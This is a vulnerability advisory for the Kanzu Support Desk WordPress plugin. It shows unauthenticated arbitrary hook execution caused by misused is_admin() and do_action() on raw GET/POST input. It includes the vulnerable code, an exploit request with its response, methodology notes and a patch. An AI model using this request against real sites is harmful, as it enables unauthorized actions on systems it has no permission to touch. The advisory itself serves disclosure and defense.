Skip to content

Arbitrary function execution vulnerability in Kanzu Support Desk

Summary

Description Details
Name Arbitrary function execution vulnerability in Kanzu Support Desk
Summary Improper use and inadequate input sanitation of is_admin and do_action allows execution of arbitrary Wordpress functions
Affected application Kanzu Support Desk
Affected revision <= 2.4.6
Vendor update available No
CVE
Ids
CVSSv3.0 Base Score 6.5
CVSS vector AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Public Exploit available No
Exploit verified
Authentication Required No

Vulnerable Code

<?php
# kanzu-support-desk.php
178         //Dashboard and Administrative Functionality
179         if ( is_admin() ) {
180             require_once( KSD_PLUGIN_DIR .  'includes/admin/class-ksd-admin.php' );
181         }

## includes/admin/class-ksd-admin.php
 259     public function do_post_and_get_actions() {
 260         if ( isset( $_POST['ksd_action'] ) ) {
 261             do_action( $_POST['ksd_action'], $_POST );
 262         }
 263         if ( isset( $_GET['ksd_action'] ) ) {
 264             do_action( $_GET['ksd_action'], $_GET );
 265         }
 266     }
 267 
  • Use of is_admin() only checks if its admin page and not user capability
  • do_action directly fetches values from GET/POST without sanitization

Exploit example :

$ http http://cve20199787.vulnsite.xxxyy/wp-admin/admin-post.php?ksd_action=do_feed_rss 
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/rss+xml; charset=UTF-8
Date: Mon, 20 May 2019 19:01:19 GMT
Keep-Alive: timeout=5, max=100
Server: Apache
Transfer-Encoding: chunked

<?xml version="1.0" encoding="UTF-8"?><rss version="0.92">
<channel>
    <title>My blog</title>
    <link>http://cve20199787.vulnsite.xxxyy</link>
    <description>Just another WordPress site</description>
    <lastBuildDate>2019-05-20 16:19:53</lastBuildDate>
    <docs>http://backend.userland.com/rss092</docs>
    <language>en-US</language>

    <!-- generator="WordPress/5.2" -->

</channel>
</rss>

Exploit Methodology

do_action( $_GET['ksd_action'], $_GET ); So, far it has been tested that only arbitrary functions with no arguments can be executed. Since the second argument is an associative array, the functions that can be executed are limit, but still possible with another plugin. Needs a function which takes values from POST without user validation.

Can attacker update post?

Edit posts checks for user capabilities which restricts edit/creating posts

Can attacker update options?

Since $_POST is associative array, not directly

How can this vulnerability pose threat?

With another plugin it is possible to inject code

Security Patch

BountySite quick fix(temporary)

--- a/wp-content/plugins/kanzu-support-desk/kanzu-support-desk.php
+++ b/wp-content/plugins/kanzu-support-desk/kanzu-support-desk.php
@@ -176,7 +176,7 @@ final class Kanzu_Support_Desk {
         require_once( KSD_PLUGIN_DIR .  'includes/public/class-ksd-public.php' );

         //Dashboard and Administrative Functionality
-        if ( is_admin() ) {
+        if ( current_user_can( 'manage_options' ) ) {
             require_once( KSD_PLUGIN_DIR .  'includes/admin/class-ksd-admin.php' );
         }

References

Plugin Vulnerabilities